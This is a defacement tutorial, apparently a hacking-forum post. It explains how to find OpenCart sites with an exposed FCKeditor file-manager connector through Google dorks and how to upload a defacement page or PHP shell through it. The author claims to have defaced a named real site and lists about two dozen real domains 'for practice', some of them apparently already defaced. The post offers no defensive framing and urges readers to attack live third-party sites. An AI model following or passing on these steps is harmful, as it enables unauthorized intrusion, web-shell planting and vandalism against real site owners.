Wordpress FCKEDITOR upload Vunerablity : Upload Your Deface Remotely

open Google.com and enter Dork:

inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

inurl:Powered By OpenCart

You'll Got a lot of websites by google, select anyone ... For Example i got this one

http://www.schoolshopper.com.au/

Then i'll will simply add the vulnerability URL after the website

Example

http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

(The path may be changed in other Website , Example site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a Page will be open Like This:

Now See The connector option which is on top left side on page, Change The Connector into PHP (see the Image below)

and Now see file upload option and upload your deface or shell

and for checking shell or deface check this url

www.site.com/deface.html

www.site.com/shell.php

I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html

FOR PRACTICE..

http://ruthsgarden.com/jaihind.html

http://www.utahflowers.net/jaihind.html

http://www.eesnet.org/jaihind.html

http://bestonlinediscounts.net/

http://wenrestaurant.com/

http://ruthsgarden.com/

http://www.utahflowers.net/

http://www.inlove.my/

http://megamall.com.pk/

http://stefanyboutique.com/

http://www.virtualgeorge.info/

http://iphoneclone.biz/

http://amourcristallis.com/

http://www.eesnet.org/

http://www.schoolshopper.com.au/

http://www.mymaxi.nl/

http://wiretek.net/

http://shop.tjokgus.com/

http://www.aquariumsystem.it/

http://uae-shopper.com/

http://organicjewelries.com/

http://www.granmasantiques.com/

http://avocadogenie.com/

http://www.inputandanalysis.com

http://eddiegifts.com/